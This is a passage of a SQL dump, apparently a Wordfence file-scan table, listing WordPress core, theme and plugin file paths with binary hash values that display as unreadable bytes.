D�','wp-content/plugins/spam-captcha/core/lang/SL_framework-th_TH.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Qw��!z�Zw��','���~͟U��hk��c[�Ӓ�*cLT���<\ru','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����k�dɐʎs','L�$0��霕A��]`��H�X\"	���q4�\'','',0,'?'),('󡢟ŇP��(KJO)Z','wp-content/themes/nirvana/images/dashed-border.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����<]\')��i�+','ٱ/,�&�M�724�$cE}Wn�Qꦪ%w(�','',0,'?'),('�M����_^y�W\ri','wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/parsedown/Parsedown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7%����\Z�ҫ�P�','�� ����=��g��t���(&���(<�ȝ7*','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('�<l��$�ۣ��i3�','wp-content/themes/hueman/parts/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HGE\"�v�q�}>�7��^','S�Q > ���R#�j�\"�|�ω`�ou�K�F','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('����K}q�!<���','wp-content/themes/supernews/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�%�j�F+FD�:Y','?�ݔ���n��\'�JpK�O=Z�����xH8','',0,'?'),('�ާM�<t�НT','wp-content/themes/precious-lite/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�eEТ�2B�]�l�','wp-content/themes/alpha-store/lib/customize-pro/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3B�2	��}�zZq�d�','# ^����a_*����V��=k�v��:�]Z','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','na��.���=��~�3','bh#�~����<�)?��\'q�ON�Wڄ�c��N','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','đA�7M�=‡�a9�','�A.K9	���L�x�x����_)� O�MF���\\','',0,'?'),('�.N���ڦ<��3�$','wp-content/themes/panoramic/upgrade/library/images/icon-features.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�0��	k,�#�t�','��d�7��\rF���D\0^JK�`�.����','',0,'?'),('�0.6_Q��3NH�+�','wp-content/themes/verbosa/content/content-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<1�_(�2�G7���K%','ü����sY�_�}Z��>�b��Jt�`�X�','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�P��D�D�rꣲ��E�','wp-content/themes/alpha-store/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�M��~&{/�r��','�f�{<i��Ȼ�E���U�\"F�҄�]&2�`','',0,'?'),('�Tn�Ê�-��iӼ�s�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_AuthNone.php',0,'��kϋ`���D��&bh','��kϋ`���D��&bh',',k~�-1\n)�[��� 1��{���(�c���','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��p��BR��ώۿ�','��<����ժPXk�/�=*}/q ��','',0,'?'),('�Z��Q�!����*�','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#x�s�G�J��t��','�A�r���x?j����#��C�F�O�G-�S�$','',0,'?'),('�m���I�G0���','wp-content/themes/verbosa/cryout/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���.��L�','Q��E9�,�\Z�H�%K�J�J���3���j�bJA','',0,'?'),('�x+gr4������gR�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sr-latin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�dP��P0WqR�J','?�\"��(\rq�K��^i\Z��w��NyJ����','',0,'?'),('�yr�Xz��8r����','wp-content/plugins/spam-captcha/core/lang/SL_framework-hr_HR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�7\Z��С6G�W�','�`���y�;V�b �Æ?`��E��r�a�.�','',0,'?'),('��S��eT	�n\r','wp-content/themes/sg-window/img/icons/small/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m������lo/���','�J+�6�b�`�^��i���?��!E�DgE�S�F','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��D��(Np��','�//އ������65���!.p�J����F','',0,'?'),('�\"��\n���J\'\'O�b','wp-content/themes/morfeu/assets/js/bootstrap/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S& \'~�}��-�kG�','k�l��0�K/_��Fv�v���SϻP�V�','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('�0b{��9i�q','wp-content/themes/tortuga/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��Y�Iu��W�Q�m�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('����� P�Pr�O','wp-content/themes/square/inc/css/chosen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�����X1[�','��e��p�y�\'����pB\'O����[}R�','',0,'?'),('�Q��4��Y�,Q','wp-content/themes/hueman/functions/widgets/alx-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��$�����',';NNc�\\��څ)�����]�ĕs��{�@iz���','',0,'?'),('�.\n�!�ϻ��l�','wp-content/themes/nirvana/admin/images/3cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^=�ه����:^Uwm','H���A�Y�y�?��l�;����?�Gw^','',0,'?'),('��}.,� ��3K8�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.fabulous.php',0,'�a�^���-��S\0G','�a�^���-��S\0G','C\0Jy/���~ L���]1~�r+�d�U\0{Z^','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',0,'AD��+�Ɛ�ɏ�mM�','AD��+�Ɛ�ɏ�mM�','G����7�T;�c�A�N#��~8�竱�a-','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('��5����d�)�dR','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.name.php',0,'\0_�z��	^��X�Me','\0_�z��	^��X�Me','��~�:�S��������:ܼ��a:c','',0,'?'),('������cE0OŦ�-','wp-content/themes/vega/parts/frontpage-4cols.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�,T��:�o�D^','��Y`۴����^�M�{�U��','',0,'?'),('�\Z֍<r��t<�_^���','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/animated-overlay.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�/|S\0����ͤ�%�','z<L��V�홉��%\'��Pk�&@�DS�ܥ','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�\"A�BH1�����(�','wp-content/plugins/unyson/framework/includes/option-types/icon/static/js/backend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�4�2N�M*)iY�','����\r���z\r\\\n��j�*V>���ǯ��','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��\'�����b]i�99','�x~���E���f>�+���<jU@��RE��OҀN','',0,'?'),('�-é\r�1��i�9T','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-whois-menu.php',0,'�Hw�,��&8i��bOT','�Hw�,��&8i��bOT','�2�Wq+�`e`�0��2�nk��i�����','',0,'?'),('�1T���8U�v��R�l�','wp-content/themes/relia/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&A�ڀ�V@�ۨ��','!#�\0H�\r\0Z��iq�©�ʅ�>s�0{��A0','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�A����_ؼ���U��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/button/static.php',0,'ٺ�L<ײ��Y�A\"�','ٺ�L<ײ��Y�A\"�','��#|x\"t���i�K,d���?��N��c�5�','',0,'?'),('�B,\n�;�t��/c�','wp-content/themes/travelify/languages/nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T-!�s���<*� ́','�X3�Kа�D<	}ٛ�&����j�U����q�','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�P^�f:����7jxW�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-gcloud-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����g�*U��ɀI','߂��̺챹\'e��A>��W����ۮ��','',0,'?'),('�Rށ�s�..��i���','wp-content/plugins/unyson/framework/static/img/logo-100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���<�s�i��','¦Ï�,o��#q��m�~�ܾ\"��\\��e�','',0,'?'),('�g������a!W�Σ','wp-content/themes/barletta/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j&]���O2~F��	w�','�<^\Zb���[�s��+H?_�g�\"�\r��','',0,'?'),('�t*FD�R��[���','wp-content/themes/fluida/cryout/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��\'��b�A�','P�<��!kQ\nN%{�zk\"أ�2��g`+��(}2�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�ȍ��m~0�i)�|','yŗ�M���#{\\�\\c�9�p	�-81�c�y8','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��Hn�����7\r','wp-content/themes/illdy/layout/fonts/font-awesome/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('����8�d�W�����','wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?4&��B��h','��9?����������������w	q���\n','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('����[���q�b�}/��','wp-content/themes/hueman/functions/czr/czr-resources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'+X8�::�T��p��','���5�Ю;���6���E��+�v:�\Zе','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('�Ƃb{�t~`���A/','wp-content/plugins/spam-captcha/core/img/info.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���tQU�ϩ��Oyy\n','2�����r�/P�����qTw\rA�&^>0q�̿','',0,'?'),('�ȉm���m��^m�B#','wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php',0,'o�5˅B]�k��%ӧ_','o�5˅B]�k��%ӧ_','ʞfc�����O>��\\뮮���w���vg','',0,'?'),('�����E0� �5<g','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/config.php',0,'ťW<�P֎n��Y�','ťW<�P֎n��Y�','L�$4p\"2�;�t����h��S5�\"{$�P�]i','',0,'?'),('��H�\n�\r�G�B�D�1','wp-content/themes/hueman/languages/hr_HR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�B��N�b\Z<g','��Y��b�6Q0|^[R��2N,\"�\02�c�','',0,'?'),('����	�6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��e�� 0�U�z���k�','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-config-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u��*�LC��l��','��;�W�1/��T^��/j��u��0}�','',0,'?'),('��0P`S��?�qCO�g','wp-content/themes/nirvana/images/socials/Picasa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mw�čb�\Zcb�wc','���P\Z�ŮI��u���O\"�]�\r�����ܩ�','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('��XmX4Z%��R<�x','wp-content/themes/alpha-store/lib/cmb_extension/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CZ���!��]A{+�`�','�`C��$Y���V�?����k���S�0�','',0,'?'),('�)���3vncߐ(','wp-content/themes/illdy/layout/js/widget-upload-image/widget-upload-image.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0����_��1tŎ�','�|ǡF���	���AaA}E��d%C�\\�wꃣDN','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',0,'�=,��.-��E-�W~','�=,��.-��E-�W~','x,p�c�lC������s{�J9Lor_0�','',0,'?'),('�f��\'��ӆ#�?','wp-content/themes/nirvana/templates/template-threecolumns-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'X���ID>1%nvB�','��0�HR���X-����h��2���Rz4�4�','',0,'?'),('�*U[G��1��λ','wp-content/themes/point/functions/widget-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z@O���;�6�/4','�v���o�p�Uuɺލ+p\\��V;.$\"\"I�','',0,'?'),('�1��[�mϮ�I8}˷�','wp-content/themes/nirvana/images/socials/Delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��E()��H','����Ҧ�w).*/��Z�jӽ&A��U(','',0,'?'),('�9ٶ(mW�D���R','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryAnimateSvg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rm��\'����2��tu','�]t;���\"���z�i�_���,��J�`.�;W�5','',0,'?'),('�:ӱ�`J��i�L���','wp-content/plugins/contact-form-7/includes/integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�Tj�Z�V=!QJ�','�Z�d��{Ų��>2����͇����','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�X�v1d\"^\"���','wp-content/themes/illdy/layout/css/main.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X���m3���','��d�R�΃�:�-�i�R�g�Uz@Y��ydTy%','',0,'?'),('�n?Ԃ1�����\'��','wp-content/themes/mh-magazine-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rQ.�^,F�=b��','����j�n�N�<cg��#��j\'0O�\0�1پ','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('����,��\n\r/�4?z','wp-content/themes/fabulous-fluid/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9a��rʏ�����a','/EՊ�i�bf |��oX(qWD�c.Y!	�g#c','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�aSkf��$��','ˉ(�qh�[�۷�+�sL��m��ݩcY�:�','',0,'?'),('���`D�|��T{^uu�','wp-content/themes/accelerate/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��\rӭ��/����','��ydZJX�*�ml�r\0v��ig�h!�:�','',0,'?'),('��$9|\Z?[3O/Hܯ','wp-content/themes/supernews/acmethemes/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����uJ�\n+','o7p���}���I7f�*����CSeʥ�p�','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Q�A��/F(�','PƧ�<Q��;$m���7��f��0��M�vv$0oh$','',0,'?'),('�˻�X$�\08 ���H�','wp-content/plugins/contact-form-7-modules/send-all-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�G���ޫ_����','��_(X1���҃(��?�q4j�k��ۥ%','',0,'?'),('��4��}H�6.��','wp-content/themes/hueman/languages/pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X~���մ��Kʰ8\"�','e�)��5W?��X�pWcH�\'��W.�\n�i','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('������/�?�E�t','wp-content/plugins/unyson/framework/core/components/backend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��˽-�L�LC:_��','�14�ms�^>+�)`R�f\"�k��_p�\"V\Z��','',0,'?'),('��J�� P��w���c','wp-content/themes/accelerate/inc/admin/images/no-sidebar-full-width-layout.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�_ܬ՚n}���','�vBo�;� \0��n��\'�ފp�ui�','',0,'?'),('��ک*8����%��\\�','wp-content/themes/skt-construction-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Yu7U�Zwa+b����','�\'e�-���E��iͪ��Ɖ;I�;��hw�C�','',0,'?'),('������y��L��','wp-content/plugins/unyson/framework/extensions/analytics/manifest.php',0,'�xee�VgY�AP�o','�xee�VgY�AP�o','�E���/8����m�OTZ��g��l	5ϗ','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1	�ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('��S���u����','wp-content/themes/tortuga/languages/tortuga.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nf\n�ƻx/Νa7�Џ�','�||�P�\Z8w��l�c�G$(k�2������','',0,'?'),('�	���)�&��Z��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/gl.js',0,'�4���*I��֎�J','�4���*I��֎�J','���Ap\'M�}rMȏ_���&����>5\\\n�','',0,'?'),('�\r�V��2P�-+x@�','wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JŐ\\�;�^�q��','}�D�uغ��i��I|�{�&��މ��g��0���','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('��qڞ�\"U?[C���X','wp-content/themes/illdy/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s\Zy��ׂT�3�t','������ʘ�x��BY�ַ�Ӯ6(\0��7�','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�5ְ�%j$��,]�˦q','wp-content/themes/sg-window/inc/customize-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ў6�)H������4�','L\'!1ۧ1���و��db�f���9{U?�','',0,'?'),('�;��S0%����N��@','wp-content/themes/illdy/layout/js/visible/visible.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@ hUM�Q�I2;�I�V','FG�o���\n	��tmg�3B����L	P`?�%�','',0,'?'),('�Pa��RȮ\\X�,�q@','wp-content/plugins/spam-captcha/lang/spam_captcha-cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��趢�t\0�� ','!�@�g�5��xJ�O��Q�4p8q ��,�l','',0,'?'),('�eP>�a����Y�P��','wp-content/themes/travelify/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�9d��`a��\"1','_k�&\"�է�q�a��@Ű����~�)�','',0,'?'),('�fI< �y�H�	&�','wp-content/themes/fabulous-fluid/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�L�`�I�	�ta','yz����@�c�^���_-�����/�l��N�On','',0,'?'),('�pWY󠂣	��P�>�','wp-content/themes/the-minimal/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�\\�ĹX����','6�>�F�y��J�]�iZ�rH����v����','',0,'?'),('�t��>]��	U��e','wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/Exceptions/TemplateDoesNotExistException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����/[�ij[��xw','6W�Ћ?\'H\n>��\r�b`I,j\Z\"H�=&��g�@','',0,'?'),('���5Y�B�,c��s���','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/bootstrap-datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�6B��	fߍ���Y�',')k�z���\'�]�X-��a����N��c	','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M#Ƃ,�n���j9{��','��+��������N)¨�����L	K�z�(','',0,'?'),('��Ȭ��f�o2�c�W�','wp-content/themes/skt-construction-lite/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��l�`��\0j\"�','��l��%-��K����19��{�7݄�0\r','',0,'?'),('��xM�5���L�\Z\Z','wp-content/plugins/wordpress-seo/frontend/class-frontend.php',0,'�[�����l�f���','�[�����l�f���','-��K�{Z�)�J�A��7�\n�Q�p�=��0','',0,'?'),('���f\Z��!�|�KU�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/day.html',0,'�c���\0u�tZ�D��:','�c���\0u�tZ�D��:','߱gQ<�W�`��m&|���\ZK��!���u�','',0,'?'),('��8��C���!0��','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php',0,'��j�=-<����E�','��j�=-<����E�','�G�p���#��,��J�M>�֓a�#�','',0,'?'),('����i�Y�uN$U-l','wp-content/themes/twentyseventeen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��H��9�#�G{�#0','�krhݢ:Ms^y�=���:P�\"g�x�p+�','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u�